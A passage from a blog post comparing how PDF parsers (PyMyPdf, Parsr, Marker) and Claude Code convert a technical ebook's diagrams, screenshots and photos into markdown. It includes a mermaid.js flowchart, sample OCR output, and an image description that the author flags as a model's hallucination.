PyMyPdf also did pretty badly: What do people Investigate what is done and how it is done... ...to identify goals Interestingly, I asked Claude Code to process this same image into a mermaid.js snippet - it’d be very cool to have a pdf parser that could do this, when appropriate: flowchart TB %% Speech bubbles (using stadium shape as approximation) Q1("What do people&lt;br/&gt;want to do when they&lt;br/&gt;use an oven?") Q2("How do people&lt;br/&gt;heat food?") %% White boxes W1[They want to&lt;br/&gt;heat food!] W2[They heat food&lt;br/&gt;at a given power&lt;br/&gt;for a given duration.] %% Black box (goal) G[Heat food&lt;br/&gt;at power&lt;br/&gt;for duration]:::goal %% Bottom boxes Whats[Whats] Hows[Hows] Goals[Goals]:::goal %% Connections Q1 --&gt; W1 Q2 --&gt; W2 W2 --&gt; G %% Bottom flow Whats --&gt; Hows --&gt; Goals %% Vertical connections (dashed) W1 -.-&gt; Whats W2 -.-&gt; Hows G -.-&gt; Goals %% Bottom labels (using invisible nodes for positioning) subgraph bottom [" "] direction LR inv1[Investigate what is done and how it is done...]:::invisible inv2[...to identify goals]:::invisible end %% Styling classDef goal fill:#000,color:#fff classDef invisible fill:transparent,stroke:none %% Hide subgraph box style bottom fill:transparent,stroke:none Screenshots Parsr just saved this as an image - probably the best option for a mixed markdown-and-images output. Marker made a table - this is a decent effort, though given the limitations of markdown tables it couldn’t really make it work. You can also see the limitations of OCR on small text: Q Search Create a money transfer   Authentication This operation allows one to transfer an amount of money from a source account to a destination account. 
There are three different types of   Transfers$\checkmark$ money transfer:• Immediate – these are executed as soon as the request is received   POST Create a money transfer • Delaved - these are executed upon a given future date· Recurring - these are executed a given occurrences number of times at a given frequency - the first occurrence being executed immediately   COL List money transfers or at a given date   CIT Get a money transfer BankingAPIScopes (transfericreate, transferiadmin)AUTHORIZATIONS   Cancel a money transfer REQUEST BODY SCHEMA: application/json   Beneficiaries string 15 characters /^\d{15}$/sourcerequiredSource account number   Accounts destinationstring 15 characters /^\d{15}$/requiredDestination account number   PyMyPdf, unsurprisingly, didn’t even try with this one. Photos Parsr naturally just saved this as an image. Marker did … poorly: Image /page/22/Picture/1 description: A bar chart titled "Fruit Preference Survey" is shown. The x-axis shows the types of fruits, and the y-axis shows the number of people. The bar chart shows that most people prefer apples, followed by bananas and oranges. 20 people prefer apples, 15 people prefer bananas, and 10 people prefer oranges. I guess the LLM misinterpreted the books and turned them into a barchart hallucination? Not so good, gemma3 model. PyMyPdf didn’t even try to handle the image. Claude Code, by comparison, did a great job - so Marker with a commercial LLM would probably produce something similar: This is a photo of a man with glasses and a beard, wearing a dark blue t-shirt with "RESPECT API GUIDELINES" text on it. He's standing in front of a white bookshelf filled with technical books and what appears to be board games. The person appears to be in a home office or study setting. Conclusion This was a kind-of fun digression. I think it’s pretty clear though that I have basically two (or three?) options here: If I just want an LLM to summarize an ebook that is mostly text, PyMyPdf is fine. 
It’s fast, easy, and there’s enough context for it to work with. If I want a full markdown version of an ebook, for detailed analysis or copying sections to Obsidian or something, it’d be worth using Marker - though maybe not with the “images as descriptions” setting. Using a free ollama LLM can be fine if I have lots of time, don’t mind some spurious descriptions, and can fiddle models / time. (this needs investigation) But maybe if I wanted something higher quality, it’d be worth using it with a commercial LLM.]]></summary></entry></feed>